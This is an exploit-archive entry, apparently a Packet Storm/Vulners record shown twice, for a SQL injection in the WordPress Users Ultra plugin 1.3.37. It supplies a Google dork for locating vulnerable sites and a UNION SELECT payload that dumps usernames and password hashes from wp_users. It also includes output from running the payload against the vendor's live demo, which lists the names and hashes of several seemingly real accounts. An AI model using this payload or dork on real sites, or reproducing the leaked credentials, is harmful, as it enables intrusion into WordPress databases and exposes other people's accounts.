Search...

WordPress Users Ultra 1.3.37 SQL Injection

2014-09-29T00:00:00

ID PACKETSTORM:128473
Type packetstorm
Reporter XroGuE
Modified 2014-09-29T00:00:00

Description

                                        
                                            `#################################################################################################  
# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability  
# Risk : High+/Critical  
# Author : XroGuE  
# Google Dork : inurl: wp-content/plugins/users-ultra/  
# Plugin Version : 1.3.37  
# Plugin Name : users ultra  
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip  
# Vendor Home : http://www.usersultra.com/  
# Date : 2014/09/27  
# Tested in : Win7 - Linux  
##################################################################################################  
# Description:   
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).  
# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it.  
# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/  
#  
# PoC :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=[id]  
#  
# Proof :  
#  
# http://www.aparat.com/v/vNI81  
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/  
#  
##################################################################################################  
#  
# Demo :  
#  
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# =&gt; Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1  
#  
#  
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--  
# =&gt; Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1  
#  
##################################################################################################  
#  
# Discovered By : XroGuE  
# Website : http://www.Att4ck3r.ir  
# E-Mail : info[at]att4ck3r[Dot]ir  
#  
##################################################################################################  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:128473", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress Users Ultra 1.3.37 SQL Injection", "description": "", "published": "2014-09-29T00:00:00", "modified": "2014-09-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/128473/WordPress-Users-Ultra-1.3.37-SQL-Injection.html", "reporter": "XroGuE", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:27", "viewCount": 12, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:17:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:27", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/128473/wpusersultra-sql.txt", "sourceData": "`################################################################################################# \n# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability \n# Risk : High+/Critical \n# Author : XroGuE \n# Google Dork : inurl: wp-content/plugins/users-ultra/ \n# Plugin Version : 1.3.37 \n# Plugin Name : users ultra \n# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip \n# Vendor Home : http://www.usersultra.com/ \n# Date : 2014/09/27 \n# Tested in : Win7 - Linux \n################################################################################################## \n# Description: \n# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version). \n# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it. \n# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/ \n# \n# PoC : \n# \n# http://localhost/wp/?page_id=117&module=messages&view=[id] \n# \n# Proof : \n# \n# http://www.aparat.com/v/vNI81 \n# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/ \n# \n################################################################################################## \n# \n# Demo : \n# \n# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- \n# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1 \n# \n# \n# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users-- \n# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1 \n# \n################################################################################################## \n# \n# Discovered By : XroGuE \n# Website : http://www.Att4ck3r.ir \n# E-Mail : info[at]att4ck3r[Dot]ir \n# \n################################################################################################## \n`\n", "immutableFields": []}